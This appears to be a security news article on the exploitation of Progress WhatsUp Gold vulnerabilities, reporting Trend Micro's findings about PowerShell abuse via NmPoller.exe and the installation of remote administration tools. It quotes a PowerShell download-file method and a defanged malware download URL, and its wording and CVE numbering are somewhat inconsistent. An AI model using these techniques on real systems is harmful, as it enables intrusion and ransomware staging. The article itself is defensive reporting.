WhatsUp Gold is a comprehensive IT infrastructure monitoring tool. While this tool is primarily designed to provide visibility into the performance and status of applications, network devices, and servers across both cloud and on-premises environments.
Recently, cybersecurity researchers at Trend Micro discovered that hackers have been actively exploiting Progress WhatsUp Gold RCE vulnerability in the wild.
Progress WhatsUp RCE Vulnerability
The attacks were observed since August 30, 2024, and were found exploiting the vulnerabilities “CVE-2024-6670” and “CVE-2024-6671.”
While besides this, both the vulnerabilities were marked with the “Critical” tag and achieved CVSS scores of 9.8.
The vulnerabilities, disclosed on August 16, allow unauthenticated attackers to retrieve encrypted passwords via SQL injection in single-user configurations.
Decoding Compliance: What CISOs Need to Know – Join Free Webinar
Attackers abused the legitimate Active Monitor PowerShell Script function within the NmPoller.exe process to execute malicious code.
The attack pattern bypassed typical initial access indicators, suggesting direct vulnerability exploitation.
The PowerShell payload lets the malware reap other malware with flashes like “(New-Object System.Net.WebClient).DownloadFile().”
The attackers attempted to install remote administration tools (RATs) like Atera Agent, Radmin RAT, SimpleHelp Remote access, and Splashtop Remote using msiexec.exe, reads Trend Micro report.
Some RATs were downloaded from sitelike hxxps://fedko[.]org/wp-includes/ID3/setup.msi.
These operations were monitored by the MXDR team with assistance from Trend Vision One activity monitoring.
Though the suspect is not yet known, but the threat in the deployment of a number of RATs points to the potential preparation of a ransomware attack.
A security patch was released on August 16, 2024, for WhatsUp Gold and included patch for both the vulnerabilities mentioned “CVE-2024-4885” and “CVE-2024-6670.”
Two weeks later, on the 30th of August, a proof-of-concept (PoC) was reported and was found on GitHub. While it took no more than several hours when, the Trend Micro MXDR team was the first to observe the exploiting activity of this vulnerability.
The attack took advantage of NmPoller.exe’s built-in capability to invoke PowerShell commands without running the PowerShell program itself, which could help in evading certain security policies.
It’s been reported that there are over 1207 devices that were found to be exposed to CVE-2024-4885, which has a critical CVSS score of 9.8.
To avoid such risks, organizations should apply patches immediately upon release, especially for severe vulnerabilities, once they are released even though there is no PoC available for these products.
Mitigations
Here below we have mentioned all the mitigations:-
- Restrict corporate services to access control.
- Enable MFA for network logins.
- Use passkeys.
- Apply patches promptly.
- Secure management consoles/APIs.
- Use strong passwords.
Simulating Cyberattack Scenarios With All-in-One Cybersecurity Platform – Watch Free Webinar